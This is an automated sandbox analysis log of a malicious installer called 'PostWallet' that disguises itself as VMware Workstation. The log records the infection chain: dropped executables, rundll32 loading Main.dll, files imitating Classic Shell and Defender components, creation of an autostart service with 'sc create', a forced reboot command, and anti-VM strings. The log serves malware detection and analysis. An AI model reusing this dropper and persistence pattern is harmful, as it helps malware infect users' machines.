          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3912:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-DFC38E711ED80E7DCCA65DBC52A2C91F7124F492Jump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: 00023948209303294#U00ac320302282349843984903.exeVirustotal: Detection: 8%
          Source: 00023948209303294#U00ac320302282349843984903.exeString found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
          Source: Update.exeString found in binary or memory: b=|baseUrl={Provides a base URL to prefix the RELEASES file packages with-a=|process-start-args=iArguments that will be used when starting executable-l=|shortcut-locations=
          Source: Update.exeString found in binary or memory: ((?=^[ ]{{0,{0}}}[^ \t\n])|\Z) # Lookahead for non-space at line-start, or end of doc
          Source: Update.exeString found in binary or memory: onError%Downloading file: 1Failed downloading URL: #Downloading url: 1Failed to download url: !squirrel-install3Starting automatic update7Failed to check for updates5Failed to download updates/Failed to apply updates9Failed to set up uninstaller){0} {1}{2} {3} # {4}
          Source: Update.exeString found in binary or memory: Scanning {0}mIgnoring {0} as the target framework is not compatible%Writing {0} to {1}UCouldn't find file for package in {1}: {0}%--squirrel-install%--squirrel-updated'--squirrel-obsolete)--squirrel-uninstall'--squirrel-firstrunAFailed to handle Squirrel events[\StringFileInfo\040904B0\SquirrelAwareVersion)SquirrelAwareVersion;Failed to promote Tray icon:
          Source: Update.exeString found in binary or memory: ..\Update.exegUpdate.exe not found, not a Squirrel-installed app?
          Source: Update.exeString found in binary or memory: update.MNo release to install, running the appIFailed to install package to app dirIFailed to update local releases file;Failed to invoke post-install;Starting fixPinnedExecutables)Fixing up tray icons
          Source: Update.exeString found in binary or memory: -delta.nupkg$iCannot apply combinations of delta and full packagesQCouldn't run Squirrel hook, continuing: ---squirrel-updated {0}---squirrel-install {0}9Squirrel Enabled Apps: [{0}]wNo apps are marked as Squirrel-aware! Going to run them all-Failed to delete key: /--squirrel-obsolete {0}7Couldn't delete directory: QCoudln't run Squirrel hook, continuing: WcleanDeadVersions: checking for version {0}kcleanDeadVersions: exclude current version folder {0}ccleanDeadVersions: exclude new version folder {0}
          Source: unknownProcess created: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
          Source: unknownProcess created: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe "C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe"
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: VMware Workstation.lnk.2.drLNK file: ..\..\..\..\..\..\Local\PostWallet\FilePosta.exe
          Source: VMware Workstation.lnk0.2.drLNK file: ..\AppData\Local\PostWallet\FilePosta.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zip1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\PolicyDefinitions.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\HISTORY.txtJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuHelperL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ExplorerL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\SkinsJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\IE Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Screen.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShell.chmJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\pack01.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PostWalletJump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic file information: File size 6569472 > 1048576
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x619000
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, FilePost?a.exe, 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, FilePost?a.exe, 00000007.00000002.4090125560.000000006E391000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup64\ClassicExplorer64.pdb source: ClassicExplorer64.dll.12.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicStartMenu\Setup64\ClassicStartMenu.pdb source: ClassicStartMenu.exe.12.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdbO source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: ClassicIE_64.exe0.12.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb source: ClassicExplorerSettings.exe.12.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000000.1656237951.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000000.1668661110.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000002.4088940375.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdb source: ClassicExplorer32.dll.12.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb`BXt< source: ClassicExplorerSettings.exe.12.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 00023948209303294#U00ac320302282349843984903.exe
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdb source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: ClassicIE_64.exe0.12.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000000.1656237951.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000000.1668661110.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000002.4088940375.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdbL@ source: ClassicExplorer32.dll.12.dr
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: ClassicIE_64.exe.12.drStatic PE information: 0xF72C17BC [Mon May 30 02:06:52 2101 UTC]
          Source: Main.dll.7.drStatic PE information: section name: .didata
          Source: ClassicIE_64.dll.12.drStatic PE information: section name: .didata
          Source: ClassicIEDLL_64.dll.12.drStatic PE information: section name: _RDATA
          Source: ClassicIE_64.exe.12.drStatic PE information: section name: .didat
          Source: ClassicStartMenuDLL.dll.12.drStatic PE information: section name: text
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B78D2A5 pushad ; iretd 2_2_00007FFD9B78D2A6
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D168200 push ecx; ret 3_2_6D168213
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6E39F601 push ecx; ret 3_2_6E39F614
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6E39F800 push eax; ret 3_2_6E39F81E
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vcruntime140.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to dropped file
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, IncJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00345C70 Warning,Warning,GetLastError,Warning,Warning,Warning,GetLastError,Warning,Warning,StartServiceW,GetLastError,Warning,GetTickCount,QueryServiceStatus,GetTickCount,GetTickCount,Sleep,QueryServiceStatus,GetLastError,Warning,Warning,Warning,3_2_00345C70
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D16732C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_6D16732C
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Workstation VMware 3_2_00342450
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx-stats.exe vmware-vmx-stats.exe 3_2_003420B0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx-stats.exe VMware 3_2_00342480
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx.exe vmware-vmx.exe 3_2_00344D00
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Server Console VMware Server Console 3_2_00343360
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx.exe vmware-vmx.exe vmware-vmx-debug.exe vmware-vmx-stats.exe vmware-vmx-debug.exe vmware-vmx-debug.exe 3_2_00341FB0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Authorization Service VMware Authorization Service 3_2_00343F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware VMware VMware 3_2_00342DF0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 2460000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 1A6C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Users\user\Desktop\VMware Workstation.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile opened / queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkJump to behavior
